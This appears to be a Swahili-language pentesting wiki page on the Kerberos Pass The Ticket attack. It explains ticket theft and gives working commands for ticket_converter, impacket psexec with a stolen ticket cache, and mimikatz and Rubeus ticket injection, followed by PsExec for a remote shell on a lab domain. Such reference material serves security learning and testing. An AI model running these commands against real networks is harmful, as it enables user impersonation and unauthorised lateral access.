Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

Pass The Ticket (PTT)

Katika mbinu ya shambulio ya Pass The Ticket (PTT), washambuliaji hupora tiketi ya uthibitishaji ya mtumiaji badala ya nywila zao au thamani za hash. Tiketi hii iliyoporwa inatumika kisha kufanana na mtumiaji, ikipata ufikiaji usioidhinishwa kwa rasilimali na huduma ndani ya mtandao.

Soma:

• Kuvuna tiketi kutoka Windows

• Kuvuna tiketi kutoka Linux

Kubadilisha tiketi za Linux na Windows kati ya majukwaa

Zana ya ticket_converter inabadilisha muundo wa tiketi kwa kutumia tiketi yenyewe tu na faili ya matokeo.

python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

In Windows Kekeo inaweza kutumika.

Shambulio la Pass The Ticket

export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass

#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

Marejeo

• https://www.tarlogic.com/blog/how-to-attack-kerberos/

Tumia Trickest kujenga na kujiendesha kazi kwa urahisi zenye nguvu za zana za jamii zilizoendelea zaidi duniani. Pata Ufikiaji Leo: